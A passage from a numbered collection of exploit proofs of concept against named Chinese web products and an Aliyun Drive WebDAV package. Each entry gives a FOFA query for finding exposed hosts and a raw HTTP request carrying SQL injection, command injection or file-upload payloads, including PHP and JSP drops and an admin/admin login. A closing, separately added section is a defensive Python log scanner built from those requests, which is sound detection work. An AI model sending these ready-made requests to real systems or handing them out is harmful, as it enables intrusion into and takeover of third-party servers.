User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}


197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close


198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager/upload file upload
FOFA:title="Authenticate Please!"
1. Request the login page to obtain the CSRF token (the csfr JWT in the response), which is then used to log in, obtain a session cookie, upload a file and fetch it:
GET /auth/login?to=/ HTTP/1.1

Response: 200, body contains csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT from the previous step to obtain a session cookie:
POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload with the session cookie:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

4. Fetch the uploaded file:
/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1


202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Fetch the page to obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Substitute the __VIEWSTATE and __EVENTVALIDATION values into the upload request:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The uploaded file is then reachable at:
/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
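For defenders who want to check existing web-server access logs against entries 190-203 above, the following Python example (added here; it is not part of the original compilation and not code from any of the vendors named) turns the PoC request lines into log indicators. The endpoint paths, the dropped-file locations (/master/img/config, /storage/uploads/*.php, /_data/Uploads/) and the payload fragments (sleep(), WAITFOR DELAY, UNION ALL SELECT, file://, backticks) are all taken from the requests above; the method restrictions, the combined-log-format parser and the sample log lines are assumptions made for the demonstration. POST bodies never reach an access log, so for the POST-based entries a hit means "the endpoint was called", and the payload marker can only fire for the GET-based ones.

```python
"""Added example for defenders, not part of the original write-up and not code
from any product named above: scan combined-format web access logs for requests
to the endpoints used by entries 190-203, and for follow-up fetches of the files
those PoCs drop. Endpoint paths and payload fragments are taken from the PoC
requests on this page; the log lines at the bottom are constructed for the demo."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List
from urllib.parse import unquote


@dataclass(frozen=True)
class Indicator:
    entry: int               # entry number in the list above
    methods: frozenset       # HTTP methods that matter; empty set = any method
    pattern: re.Pattern      # searched in the URL-decoded request target
    what: str
    path_only: bool = False  # match against the path with the query string removed


ANY = frozenset()
POST = frozenset({"POST"})

# Endpoints straight from the PoC request lines above. Upload PoCs are followed
# by a fetch of the dropped file, so those locations are listed as well.
INDICATORS = [
    Indicator(190, POST, re.compile(r"/index\.php/admin/Userinfo/poihuoqu", re.I), "poihuoqu file read"),
    Indicator(191, POST, re.compile(r"/CDGServer3/.*NavigationAjax", re.I), "NavigationAjax SQL injection"),
    Indicator(192, POST, re.compile(r"/JoinfApp/EMail/UploadEmailAttr\?name=\.ashx", re.I), "UploadEmailAttr .ashx upload"),
    Indicator(193, POST, re.compile(r"/master/ajaxActions/setSystemTimeAction\.php", re.I), "setSystemTimeAction command execution"),
    Indicator(193, ANY, re.compile(r"^/master/img/config$", re.I), "setSystemTimeAction output file fetched", True),
    Indicator(194, POST, re.compile(r"/servlet/uploadAttachmentServlet", re.I), "uploadAttachmentServlet upload"),
    Indicator(195, POST, re.compile(r"/send_order\.cgi\?parameter=operation", re.I), "send_order.cgi command execution"),
    Indicator(196, POST, re.compile(r"/cas/userCtl/resetPasswordBySuper", re.I), "resetPasswordBySuper password reset"),
    Indicator(197, ANY, re.compile(r"/entsoft/Quotegask_editAction\.entweb", re.I), "Quotegask_editAction SQL injection"),
    Indicator(198, ANY, re.compile(r"/aliyundrive-webdav/query\?sid=", re.I), "aliyundrive-webdav sid command injection"),
    Indicator(199, POST, re.compile(r"/assetsmanager/upload", re.I), "Cockpit assetsmanager upload"),
    Indicator(199, ANY, re.compile(r"^/storage/uploads/[^/]+\.php$", re.I), "Cockpit uploaded PHP file fetched", True),
    Indicator(200, ANY, re.compile(r"/dmplayer/dmku/\?.*\bac=del\b", re.I), "SeaCMS dmku SQL injection"),
    Indicator(201, POST, re.compile(r"/newsedit/newsplan/task/binary\.do", re.I), "binary.do SQL injection"),
    Indicator(202, POST, re.compile(r"/User/AccountEdit\.aspx", re.I), "AccountEdit upload"),
    Indicator(202, ANY, re.compile(r"^/_data/Uploads/", re.I), "AccountEdit uploaded file fetched", True),
    Indicator(203, POST, re.compile(r"/RedseaPlatform/PtFjk\.mob\?method=upload", re.I), "PtFjk upload"),
]

# Payload fragments visible in the GET-based PoCs above. POST bodies are not in
# an access log, so this is a confidence boost, not a requirement for a hit.
PAYLOAD_MARKERS = re.compile(r"sleep\s*\(|waitfor\s+delay|union\s+all\s+select|file://|`", re.I)

# Apache/nginx combined log format: client ident user [time] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')


@dataclass
class Hit:
    entry: int
    client: str
    method: str
    target: str
    status: int
    what: str
    payload_marker: bool


def scan_line(line: str) -> List[Hit]:
    """Return every indicator the request in one log line matches (usually 0 or 1)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    method, target = m["method"], unquote(m["target"])  # decode %60 etc. before matching
    path = target.split("?", 1)[0]
    hits = []
    for ind in INDICATORS:
        if ind.methods and method not in ind.methods:
            continue
        if ind.pattern.search(path if ind.path_only else target):
            hits.append(Hit(ind.entry, m["client"], method, target, int(m["status"]),
                            ind.what, bool(PAYLOAD_MARKERS.search(target))))
    return hits


def scan_log(lines: Iterable[str]) -> List[Hit]:
    return [hit for line in lines for hit in scan_line(line)]


def by_client(hits: Iterable[Hit]) -> Dict[str, List[int]]:
    """Entries each client address touched; one client probing several entries is a scanner."""
    seen: Dict[str, set] = {}
    for hit in hits:
        seen.setdefault(hit.client, set()).add(hit.entry)
    return {client: sorted(entries) for client, entries in seen.items()}


# Constructed sample log (documentation IP ranges); not taken from a real host.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/May/2024:10:01:02 +0800] "POST /index.php/admin/Userinfo/poihuoqu HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/May/2024:10:01:05 +0800] "GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [12/May/2024:10:02:00 +0800] "GET /User/AccountEdit.aspx HTTP/1.1" 200 5210 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [12/May/2024:10:02:09 +0800] "POST /User/AccountEdit.aspx HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [12/May/2024:10:02:10 +0800] "GET /_data/Uploads/1123.txt HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/May/2024:10:03:00 +0800] "GET /index.php/home/index HTTP/1.1" 200 800 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/May/2024:10:03:02 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60id%60 HTTP/1.1" 200 40 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        flag = " [payload marker]" if hit.payload_marker else ""
        print(f"#{hit.entry} {hit.client} {hit.method} {hit.target} -> {hit.status}: {hit.what}{flag}")
```

Two design choices worth noting: the request target is URL-decoded before matching, so the %60 backticks of entry 198 are caught the same way as literal ones, and the legitimate pages among the endpoints (AccountEdit.aspx is an ordinary profile page) are only flagged on the method the PoC uses, which keeps normal browsing out of the results. A successful upload shows up as a POST to the endpoint followed by a GET of the dropped file from the same client, which is the pair `by_client` is meant to surface.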